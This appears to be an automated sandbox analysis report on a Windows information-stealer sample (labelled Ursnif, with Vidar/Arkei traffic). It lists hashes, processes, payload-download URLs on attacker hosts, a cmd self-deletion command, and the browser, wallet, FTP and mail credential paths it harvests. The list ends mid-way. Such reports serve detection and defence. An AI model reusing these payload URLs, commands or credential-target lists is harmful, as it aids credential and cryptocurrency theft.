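- * MalFamily: "Ursnif"
- * Note on MalFamily: the label above is the classification attached to the submitted sample and is not confirmed by the behaviour recorded below. The only family-specific network signature in this report is "ET TROJAN Vidar/Arkei Stealer Client Data Upload", and the recorded activity (NSS/Mozilla runtime DLLs fetched from otnet.xyz, a staging folder under C:\\ProgramData holding passwords.txt, information.txt and wallet copies, and a lookup against ip-api.com) is that of an information stealer. Treat the family name as unverified and key detections on the hashes, hosts and file paths rather than on the label.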
- * MalScore: 10.0
- * File Name: "Ursnif_6cc70fb7b014fe253989338d5008381d.exe"
- * File Size: 664576
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "83502653aa68b492d6382416ecc27a7350be45968211f117ab2a860fb5fe093d"
- * MD5: "6cc70fb7b014fe253989338d5008381d"
- * SHA1: "eaab87820e5da8b64eb2d2bc2e2bbbac3a43130f"
- * SHA512: "e4dbdaaac28eeb15ea6cbd3554090f2883a4a905681269ac72380480d9cc51dc2f079ba7fc37bfe8534d94ffd0629e8bfbcc6c45980ed0300aae9369ad72f01a"
- * CRC32: "2349236C"
- * SSDEEP: "12288:EGolQnTahriSgWOGi80bfjPpBGxP7+BubZa3BR/mLV09J569buuKa1:EGR+hriSgUi80DOxVa3mLuJ569Cub1"
- * Process Execution:
- "Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- * Executed Commands:
- "C:\\ProgramData\\JCXFRDIE2I.exe ",
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\ProgramData\\JCXFRDIE2I.exe"
- "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request": "http://otnet.xyz/141"
- "suspicious_request": "http://otnet.xyz/freebl3.dll"
- "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "suspicious_request": "http://otnet.xyz/mozglue.dll"
- "suspicious_request": "http://otnet.xyz/msvcp140.dll"
- "suspicious_request": "http://otnet.xyz/nss3.dll"
- "suspicious_request": "http://otnet.xyz/softokn3.dll"
- "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
- "suspicious_request": "http://ip-api.com/line/"
- "suspicious_request": "http://otnet.xyz/"
- "suspicious_request": "http://bookyeti.com/img/3001.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://otnet.xyz/141"
- "url": "http://otnet.xyz/freebl3.dll"
- "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
- "url": "http://otnet.xyz/mozglue.dll"
- "url": "http://otnet.xyz/msvcp140.dll"
- "url": "http://otnet.xyz/nss3.dll"
- "url": "http://otnet.xyz/softokn3.dll"
- "url": "http://otnet.xyz/vcruntime140.dll"
- "url": "http://ip-api.com/line/"
- "url": "http://otnet.xyz/"
- "url": "http://bookyeti.com/img/3001.exe"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13574119 times"
- "Description": "Attempts to execute a binary from a dead or sinkholed URL",
- "Details":
- "dead_binary": "c:\\programdata\\jcxfrdie2i.exe"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Español"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- * Started Service:
- "VaultSvc",
- "WerSvc",
- "W32Time"
- * Mutexes:
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
- "Local\\WERReportingForProcess2776",
- "Global\\\\xe5\\x88\\x90\\xc2\\x90",
- "Global\\\\xed\\x95\\xb02",
- "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
- * Modified Files:
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\ld",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\historych",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\c",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\wd",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy\\\\xec\\x90\\xa0\\xcd\\xb2\\xe0\\xb8\\xa8\\xc7\\x8b\\xeb\\x86\\x88\\xc7\\xb2\\xe9\\x95\\xb0\\xc8\\x83",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC\\\r",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash\\\r",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX\\\r",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
- "C:\\ProgramData\\JCXFRDIE2I.exe",
- "C:\\ProgramData\\JCXFRDIE2I.exe:Zone.Identifier",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\16379d62-d2d1-45c7-a48c-f33b02ea0429",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBC62.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFBE.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFDE.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERC713.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
- * Deleted Files:
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin",
